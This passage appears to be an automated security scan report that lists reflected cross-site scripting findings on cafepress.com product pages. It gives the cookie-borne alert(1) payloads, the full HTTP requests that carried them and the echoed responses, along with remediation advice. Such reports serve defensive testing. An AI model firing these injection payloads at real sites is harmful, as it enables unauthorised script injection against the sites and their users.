e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 71207 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71207 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '8caa8</script><script>alert(1)</script>49b69bc8c1b ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.100. http://www.cafepress.com/make/custom-buttons [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-buttons
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d08c3"-alert(1)-"5c9b7d83b0c was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd08c3"-alert(1)-"5c9b7d83b0c ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 54737 Date: Sun, 26 Dec 2010 13:48:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54737 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd08c3"-alert(1)-"5c9b7d83b0c "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.101. http://www.cafepress.com/make/custom-buttons [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-buttons
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 467e9</script><script>alert(1)</script>f97ce1fac6a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=467e9</script><script>alert(1)</script>f97ce1fac6a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 54759 Date: Sun, 26 Dec 2010 13:48:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '467e9</script><script>alert(1)</script>f97ce1fac6a ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.102. http://www.cafepress.com/make/custom-hats [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-hats
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1aa5"-alert(1)-"c0e3e257a86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAb1aa5"-alert(1)-"c0e3e257a86 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 54696 Date: Sun, 26 Dec 2010 13:48:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54696 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb1aa5"-alert(1)-"c0e3e257a86 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.103. http://www.cafepress.com/make/custom-hats [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-hats
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a30c5</script><script>alert(1)</script>e0b31c17436 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a30c5</script><script>alert(1)</script>e0b31c17436 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 54711 Date: Sun, 26 Dec 2010 13:48:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54711 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'a30c5</script><script>alert(1)</script>e0b31c17436 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.104. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-hoodies-sweatshirts
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5222"-alert(1)-"66934ad12b9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hoodies-sweatshirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAb5222"-alert(1)-"66934ad12b9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 69614 Date: Sun, 26 Dec 2010 13:47:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 69614 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb5222"-alert(1)-"66934ad12b9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.105. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-hoodies-sweatshirts
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b326</script><script>alert(1)</script>7b9d98d964e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hoodies-sweatshirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; 